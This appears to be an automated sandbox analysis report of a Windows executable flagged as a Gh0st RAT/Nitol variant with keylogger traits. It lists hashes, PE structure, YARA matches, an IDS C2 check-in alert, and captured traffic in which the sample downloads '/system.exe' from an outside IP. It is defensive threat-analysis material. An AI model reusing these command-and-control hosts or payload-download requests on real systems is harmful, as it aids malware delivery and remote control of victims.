                                                                  SHA-256:C64386B6FB1F813FF66AC76972E96E6B08F6230039FC84DF20E505447F5B7A9A
                                                                  SHA-512:DA80DF565E53839711F369DD53842E63AEDDD2E44F0E6248782E5EE2F2CA314CC2F6618CAC3F717784E702317086F84DCF2C8FC558ED40E43A19C73BE39B7EB4
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:oh9...X?0..oh9...X?PRPVOSROSZBBSTXPWXVQoh9....X?95+,?oh9...X?0..oh9...X?PRPVOSROSZBBSTXPWXWSoh9....X?.95+,?
                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Entropy (8bit):7.619377781108329
                                                                  TrID:
                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                  File name:SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
                                                                  File size:962'560 bytes
                                                                  MD5:b36366f4a27987d6de47887b03f29c68
                                                                  SHA1:6f290bd6c132ec5c824558a29bdf75d25ced94e3
                                                                  SHA256:4cc1ab70e6fd0d4441c778d40212c6e3114e14d56da85717214f8498e1c1501b
                                                                  SHA512:a9441175872e88fc49482ef4707fad0e1f15a3ee1f4c74f3a2fafd3744968025d35ca61ed1905239a01df58511985e00708cdae7cb9acae4cca8b51032e02359
                                                                  SSDEEP:24576:q4bDOphvGTO5+L0Un5cOoaPaoWXqEinqg4dNMBlqD9:HD2n+H5cOoUao+vib4rMu
                                                                  TLSH:C725E046E968523EF0564673C80AA98CD4B40DA02FF6C0772FEE3F9276F1677502AD46
                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l..............N........+.......+......................%...............Rich............................PE..L......_...........
                                                                  Icon Hash:8f2b393142e03107
                                                                  Entrypoint:0x52ea19
                                                                  Entrypoint Section:.sedata
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                  DLL Characteristics:
                                                                  Time Stamp:0x5FFDF708 [Tue Jan 12 19:22:48 2021 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:4
                                                                  OS Version Minor:0
                                                                  File Version Major:4
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:4
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:3a8897c84eb41f36b4bbabcc617408b8
                                                                  Instruction
                                                                  call 00007F8AB07DE821h
                                                                  push ebx
                                                                  popad
                                                                  outsb
                                                                  imul ebp, dword ptr [bp+65h], 69685320h
                                                                  insb
                                                                  outsb
                                                                  and byte ptr [esi+32h], dh
                                                                  xor ebp, dword ptr [esi]
                                                                  cmp dword ptr [esi], ebp
                                                                  xor byte ptr [eax], al
                                                                  pushfd
                                                                  push esi
                                                                  cmc
                                                                  lea esp, dword ptr [esp+04h]
                                                                  jmp 00007F8AB07DE7C2h
                                                                  neg di
                                                                  xchg bh, bl
                                                                  mov bh, EFh
                                                                  mov bl, byte ptr [esp]
                                                                  lea ebx, dword ptr [edi-000000CFh]
                                                                  jmp 00007F8AB07DE830h
                                                                  aaa
                                                                  push ds
                                                                  imul ecx, dword ptr [eax-7405749Ah], D7BF66FDh
                                                                  jne 00007F8AB07DE78Bh
                                                                  sbb al, 24h
                                                                  jmp 00007F8AB07DE7DEh
                                                                  sub dword ptr [edi+56A95A3Fh], ebp
                                                                  inc ecx
                                                                  rcl byte ptr [esi+31h], FFFFFFC0h
                                                                  and bh, ch
                                                                  int3
                                                                  pop edi
                                                                  cmpsb
                                                                  ror dword ptr [ebx+3C8B243Ch], 1
                                                                  and al, E8h
                                                                  salc
                                                                  Programming Language:
                                                                  • [C++] VS98 (6.0) SP6 build 8804
                                                                  • [ C ] VS98 (6.0) SP6 build 8804
                                                                  • [C++] VS98 (6.0) build 8168
                                                                  • [EXP] VC++ 6.0 SP5 build 8804
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x130053 | 0xa0 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x131000 | 0x17000 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x6e000 | 0x10000 | 89eaa871ac3ce54b93c0d2f65e1c1d4d | False | 0.96875 | data | 7.927037404813812 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.sedata | 0x6f000 | 0xc1000 | 0xc1000 | bf722ce480854acdf4d116fabeccb858 | False | 0.8490945292260362 | data | 7.819402663359735 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_NOT_PAGED, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x130000 | 0x1000 | 0x1000 | 47b645013f82c4711999b676bcf9a5b4 | False | 0.064697265625 | data | 0.6970172999319627 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_NOT_PAGED, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x131000 | 0x17000 | 0x17000 | 75995d4d0005aee52f82dae70db6f5d8 | False | 0.2623131793478261 | data | 4.015639241047175 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.sedata | 0x148000 | 0x1000 | 0x1000 | ab112cba3a4ada2c7d17504439e63a04 | False | 0.78076171875 | data | 7.981450049825861 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x1312b0 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 0 | Chinese | China | 0.5128048780487805
RT_ICON | 0x131918 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | Chinese | China | 0.6196236559139785
RT_ICON | 0x131c00 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | Chinese | China | 0.6655405405405406
RT_ICON | 0x131d28 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0, 256 important colors | Chinese | China | 0.5903518123667377
RT_ICON | 0x132bd0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0, 256 important colors | Chinese | China | 0.6926895306859205
RT_ICON | 0x133478 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0, 256 important colors | Chinese | China | 0.5014450867052023
RT_ICON | 0x1339e0 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 0 | Chinese | China | 0.19515260854134628
RT_ICON | 0x144208 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Chinese | China | 0.3253112033195021
RT_ICON | 0x1467b0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Chinese | China | 0.40337711069418386
RT_ICON | 0x147858 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Chinese | China | 0.5585106382978723
RT_GROUP_ICON | 0x147cc0 | 0x92 | data | Chinese | China | 0.6438356164383562
RT_GROUP_ICON | 0x147d54 | 0x22 | data | Chinese | China | 1.0
RT_GROUP_ICON | 0x147d78 | 0x14 | data | Chinese | China | 1.25
DLL | Import
KERNEL32.dll | GetProcAddress
MSVCRT.dll | strncpy
IPHLPAPI.DLL | GetInterfaceInfo
PSAPI.DLL | GetMappedFileNameW
USER32.dll | GetWindow
ADVAPI32.dll | RegDeleteKeyA
SHELL32.dll | SHGetFolderPathW
Language of compilation system | Country where language is spoken | Map
Chinese | China |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-18T22:25:41.952742+0200 | 2843729 | ETPRO MALWARE Win32/Fsysna.hlwd CnC Checkin | 1 | 192.168.2.5 | 49796 | 110.40.45.163 | 70 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 18, 2024 22:25:40.823019981 CEST | 49793 | 80 | 192.168.2.5 | 106.52.15.123
Oct 18, 2024 22:25:40.828210115 CEST | 80 | 49793 | 106.52.15.123 | 192.168.2.5
Oct 18, 2024 22:25:40.828435898 CEST | 49793 | 80 | 192.168.2.5 | 106.52.15.123
Oct 18, 2024 22:25:40.828465939 CEST | 49793 | 80 | 192.168.2.5 | 106.52.15.123
Oct 18, 2024 22:25:40.833616972 CEST | 80 | 49793 | 106.52.15.123 | 192.168.2.5
Oct 18, 2024 22:25:41.502017021 CEST | 80 | 49793 | 106.52.15.123 | 192.168.2.5
Oct 18, 2024 22:25:41.502089977 CEST | 49793 | 80 | 192.168.2.5 | 106.52.15.123
Oct 18, 2024 22:25:41.502541065 CEST | 49793 | 80 | 192.168.2.5 | 106.52.15.123
Oct 18, 2024 22:25:41.508801937 CEST | 80 | 49793 | 106.52.15.123 | 192.168.2.5
Oct 18, 2024 22:25:41.534971952 CEST | 49796 | 70 | 192.168.2.5 | 110.40.45.163
Oct 18, 2024 22:25:41.540184975 CEST | 70 | 49796 | 110.40.45.163 | 192.168.2.5
Oct 18, 2024 22:25:41.540261030 CEST | 49796 | 70 | 192.168.2.5 | 110.40.45.163
Oct 18, 2024 22:25:41.952742100 CEST | 49796 | 70 | 192.168.2.5 | 110.40.45.163
Oct 18, 2024 22:25:41.957889080 CEST | 70 | 49796 | 110.40.45.163 | 192.168.2.5
Oct 18, 2024 22:26:29.150090933 CEST | 49977 | 80 | 192.168.2.5 | 106.52.15.123
Oct 18, 2024 22:26:29.155126095 CEST | 80 | 49977 | 106.52.15.123 | 192.168.2.5
Oct 18, 2024 22:26:29.155206919 CEST | 49977 | 80 | 192.168.2.5 | 106.52.15.123
Oct 18, 2024 22:26:29.158982992 CEST | 49977 | 80 | 192.168.2.5 | 106.52.15.123
Oct 18, 2024 22:26:29.163927078 CEST | 80 | 49977 | 106.52.15.123 | 192.168.2.5
Oct 18, 2024 22:26:29.838087082 CEST | 80 | 49977 | 106.52.15.123 | 192.168.2.5
Oct 18, 2024 22:26:29.838206053 CEST | 49977 | 80 | 192.168.2.5 | 106.52.15.123
Oct 18, 2024 22:26:30.235960007 CEST | 49977 | 80 | 192.168.2.5 | 106.52.15.123
Oct 18, 2024 22:26:30.240916967 CEST | 80 | 49977 | 106.52.15.123 | 192.168.2.5
Oct 18, 2024 22:26:36.457086086 CEST | 49978 | 80 | 192.168.2.5 | 106.52.15.123
Oct 18, 2024 22:26:36.462037086 CEST | 80 | 49978 | 106.52.15.123 | 192.168.2.5
Oct 18, 2024 22:26:36.462124109 CEST | 49978 | 80 | 192.168.2.5 | 106.52.15.123
Oct 18, 2024 22:26:36.462358952 CEST | 49978 | 80 | 192.168.2.5 | 106.52.15.123
Oct 18, 2024 22:26:36.468374968 CEST | 80 | 49978 | 106.52.15.123 | 192.168.2.5
Oct 18, 2024 22:26:37.162147045 CEST | 80 | 49978 | 106.52.15.123 | 192.168.2.5
Oct 18, 2024 22:26:37.162209034 CEST | 49978 | 80 | 192.168.2.5 | 106.52.15.123
Oct 18, 2024 22:26:37.162411928 CEST | 49978 | 80 | 192.168.2.5 | 106.52.15.123
Oct 18, 2024 22:26:37.167359114 CEST | 80 | 49978 | 106.52.15.123 | 192.168.2.5
Oct 18, 2024 22:28:41.960802078 CEST | 49796 | 70 | 192.168.2.5 | 110.40.45.163
Oct 18, 2024 22:28:41.965892076 CEST | 70 | 49796 | 110.40.45.163 | 192.168.2.5
                                                                  • 106.52.15.123
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49793 | 106.52.15.123 | 80 | 1476 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 22:25:40.828465939 CEST | 282 | OUT | GET /system.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 106.52.15.123
Connection: Keep-Alive

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49977 | 106.52.15.123 | 80 | 4068 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 22:26:29.158982992 CEST | 282 | OUT | GET /system.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 106.52.15.123
Connection: Keep-Alive

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49978 | 106.52.15.123 | 80 | 6208 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 22:26:36.462358952 CEST | 282 | OUT | GET /system.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 106.52.15.123
Connection: Keep-Alive

                                                                  Target ID:0
                                                                  Start time:16:25:08
                                                                  Start date:18/10/2024
                                                                  Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe"
                                                                  Imagebase:0x400000
                                                                  File size:962'560 bytes
                                                                  MD5 hash:B36366F4A27987D6DE47887B03F29C68
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_YoungLotus, Description: Yara detected Young Lotus, Source: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Gh0st_ee6de6bc, Description: Identifies a variant of Gh0st Rat, Source: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Author: unknown
                                                                  • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Gh0st_ee6de6bc, Description: Identifies a variant of Gh0st Rat, Source: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000002.4521410677.000000000282E000.00000040.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000003.2197052330.0000000002604000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:low
                                                                  Has exited:false

                                                                  Target ID:4
                                                                  Start time:16:25:51
                                                                  Start date:18/10/2024
                                                                  Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe"
                                                                  Imagebase:0x400000
                                                                  File size:962'560 bytes
                                                                  MD5 hash:B36366F4A27987D6DE47887B03F29C68
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000004.00000002.2913482598.0000000010012000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 00000004.00000002.2913482598.0000000010012000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Gh0st_ee6de6bc, Description: Identifies a variant of Gh0st Rat, Source: 00000004.00000002.2913482598.0000000010012000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                  • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000004.00000002.2903752097.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 00000004.00000002.2903752097.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_YoungLotus, Description: Yara detected Young Lotus, Source: 00000004.00000002.2903752097.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Gh0st_ee6de6bc, Description: Identifies a variant of Gh0st Rat, Source: 00000004.00000002.2903752097.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Author: unknown
                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000004.00000002.2913041831.0000000002A8D000.00000040.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000004.00000003.2660700372.0000000002861000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  Target ID:5
                                                                  Start time:16:25:59
                                                                  Start date:18/10/2024
                                                                  Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe"
                                                                  Imagebase:0x400000
                                                                  File size:962'560 bytes
                                                                  MD5 hash:B36366F4A27987D6DE47887B03F29C68
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000002.2947721338.0000000010012000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 00000005.00000002.2947721338.0000000010012000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Gh0st_ee6de6bc, Description: Identifies a variant of Gh0st Rat, Source: 00000005.00000002.2947721338.0000000010012000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                  • Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000005.00000002.2945751366.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_Nitol, Description: Yara detected Nitol, Source: 00000005.00000002.2945751366.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_YoungLotus, Description: Yara detected Young Lotus, Source: 00000005.00000002.2945751366.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Gh0st_ee6de6bc, Description: Identifies a variant of Gh0st Rat, Source: 00000005.00000002.2945751366.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Author: unknown
                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000005.00000002.2946883460.00000000027B9000.00000040.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000005.00000003.2739388386.0000000002592000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:low
                                                                  Has exited:true

                                                                    Execution Graph

                                                                    Execution Coverage:2%
                                                                    Dynamic/Decrypted Code Coverage:49.9%
                                                                    Signature Coverage:58.6%
                                                                    Total number of Nodes:684
                                                                    Total number of Limit Nodes:45
execution_graph: interactive call-graph rendering (684 nodes, 45 limit nodes); the raw node and edge dump is not reproduced in text.
54091 100070f8 FreeLibrary 54090->54091 54091->54088 54092->54088 54092->54089 54092->54090 54096 10007391 54093->54096 54094 100073a5 memset 54097 100073c4 LoadLibraryA GetProcAddress GetProcAddress GetProcAddress CreateToolhelp32Snapshot 54094->54097 54095 1000739e FreeLibrary 54095->54094 54096->54094 54096->54095 54098 10007aea CloseHandle lstrlenA 54097->54098 54099 10007a5f strstr 54097->54099 54100 10007b11 54098->54100 54101 10007b03 lstrcpyA 54098->54101 54099->54098 54102 10007a81 54099->54102 54103 10007b20 GetLastInputInfo GetTickCount 54100->54103 54104 10007b17 FreeLibrary 54100->54104 54101->54100 54105 10007a8d Process32First 54102->54105 54106 10007ace strstr 54102->54106 54107 10007a9e lstrcmpiA 54102->54107 54103->54050 54104->54103 54105->54102 54106->54098 54106->54105 54108 10007ac0 lstrcatA lstrcatA 54107->54108 54109 10007ab1 Process32Next 54107->54109 54108->54106 54109->54102 54111 1000712b 17 API calls 54110->54111 54112 1000733a lstrlenA 54111->54112 54113 10007356 lstrlenA 54112->54113 54114 1000734a lstrcpyA 54112->54114 54113->54052 54114->54113 54144 100012f1 54115->54144 54118 10001f44 54120 1000104c 8 API calls 54118->54120 54119 10001e8d ??2@YAPAXI 54121 10001f82 54119->54121 54122 10001e9f memcpy 54119->54122 54124 10001f51 54120->54124 54121->53977 54155 1000104c 54122->54155 54126 100012f1 VirtualFree 54124->54126 54128 10001f59 54126->54128 54127 1000104c 8 API calls 54129 10001ece 54127->54129 54130 1000104c 8 API calls 54128->54130 54131 1000104c 8 API calls 54129->54131 54135 10001f64 54130->54135 54132 10001edb 54131->54132 54133 1000104c 8 API calls 54132->54133 54134 10001eef 54133->54134 54136 1000104c 8 API calls 54134->54136 54147 10001f89 54135->54147 54137 10001efa ??3@YAXPAX ??2@YAPAXI memcpy 54136->54137 54139 100012f1 VirtualFree 54137->54139 54140 10001f26 54139->54140 54141 1000104c 8 API calls 54140->54141 54142 10001f33 54141->54142 54142->54135 54143 10001f39 ??3@YAXPAX 54142->54143 54143->54135 54145 
10001309 54144->54145 54146 100012fb VirtualFree 54144->54146 54145->54118 54145->54119 54146->54145 54148 10001fa0 54147->54148 54151 10001fb9 54148->54151 54152 10001ff1 54148->54152 54149 10001fbd send 54149->54151 54150 10001ff8 send 54150->54152 54153 1000200f 54150->54153 54151->54149 54151->54153 54154 10001fdb Sleep 54151->54154 54152->54150 54152->54153 54153->54121 54154->54151 54154->54152 54156 10001055 54155->54156 54161 100011a4 54156->54161 54159 10001068 54159->54127 54160 1000106c memcpy 54160->54159 54162 100011b3 54161->54162 54163 10001063 54162->54163 54170 10001155 54162->54170 54163->54159 54163->54160 54165 100011db _ftol VirtualAlloc 54165->54163 54166 10001202 54165->54166 54167 10001210 memcpy 54166->54167 54168 1000121d 54166->54168 54167->54168 54168->54163 54169 10001224 VirtualFree 54168->54169 54169->54163 54171 10001176 54170->54171 54172 10001169 _ftol 54170->54172 54173 10001191 _ftol 54171->54173 54174 10001184 _ftol 54171->54174 54172->54165 54173->54165 54174->54165 54175->53987 54176->53993 54181 24be197 54183 24be1a1 54181->54183 54184 24be1a8 54183->54184 54185 24be1b6 LdrInitializeThunk 54183->54185 54186 2492657 54188 2492703 54186->54188 54187 2492874 54206 2492c00 54187->54206 54214 24929ba 54187->54214 54188->54187 54189 2494056 54188->54189 54241 2492b61 54189->54241 54328 24d30ff 54189->54328 54190 248f2b7 GetPEB 54191 24942d2 54190->54191 54193 24942d6 GetPEB 54191->54193 54198 249430e 54191->54198 54193->54198 54194 24940c7 54194->54241 54427 248f2b7 GetPEB 54194->54427 54195 247abbd 11 API calls 54197 2492b4e 54195->54197 54200 2492b52 54197->54200 54207 2492bb3 54197->54207 54332 247a709 54200->54332 54201 24930ca 54291 248bacc 54201->54291 54203 2494124 54208 249413d 54203->54208 54209 249412e GetPEB 54203->54209 54204 2494114 GetPEB 54204->54203 54206->54201 54244 2492ed6 54206->54244 54210 24931e6 GetPEB 54207->54210 54246 2493246 54207->54246 54211 248f2b7 GetPEB 54208->54211 54209->54208 54212 24931f3 GetPEB 
54210->54212 54223 249320e 54210->54223 54213 2494151 54211->54213 54212->54223 54215 2494165 54213->54215 54216 2494155 GetPEB 54213->54216 54214->54195 54214->54207 54214->54241 54219 249416f GetPEB 54215->54219 54237 2494197 54215->54237 54216->54215 54218 24930ea 54218->54207 54220 247abbd 11 API calls 54218->54220 54218->54241 54224 249417e 54219->54224 54219->54237 54225 249316b 54220->54225 54221 249303b 54221->54207 54226 249303f 54221->54226 54222 248f2b7 GetPEB 54228 24941b9 54222->54228 54229 2493237 GetPEB 54223->54229 54230 248f2b7 GetPEB 54224->54230 54225->54207 54231 249316f 54225->54231 54232 247a709 51 API calls 54226->54232 54227 2493fbe GetPEB 54227->54241 54233 24941cd 54228->54233 54234 24941bd GetPEB 54228->54234 54229->54246 54235 2494183 54230->54235 54236 247a709 51 API calls 54231->54236 54232->54241 54242 248f2b7 GetPEB 54233->54242 54247 24941f0 54233->54247 54234->54233 54235->54237 54238 2494187 GetPEB 54235->54238 54236->54241 54237->54222 54238->54237 54239 2493f7e GetPEB 54239->54241 54240 2493f24 54240->54239 54241->54190 54245 24941dc 54242->54245 54243 2494227 GetPEB 54243->54241 54244->54207 54244->54241 54259 247abbd 54244->54259 54245->54247 54248 24941e0 GetPEB 54245->54248 54246->54241 54249 247abbd 11 API calls 54246->54249 54251 2493b8e 54246->54251 54253 247a709 51 API calls 54246->54253 54255 24932d3 54246->54255 54247->54243 54248->54247 54249->54246 54250 2493c46 54250->54255 54416 248c197 54250->54416 54251->54250 54254 2493be9 GetPEB 54251->54254 54253->54246 54256 2493bf6 GetPEB 54254->54256 54257 2493c11 54254->54257 54255->54227 54255->54240 54255->54241 54256->54257 54258 2493c37 GetPEB 54257->54258 54258->54250 54265 247abde 54259->54265 54260 24d996a 54261 24d996f GetPEB 54260->54261 54262 24d9985 GetPEB 54261->54262 54290 247ac98 54261->54290 54262->54290 54264 247ac2c 54264->54261 54266 247ac36 54264->54266 54265->54260 54268 247ac3b 54265->54268 54429 24be187 LdrInitializeThunk 54265->54429 54267 248f2b7 
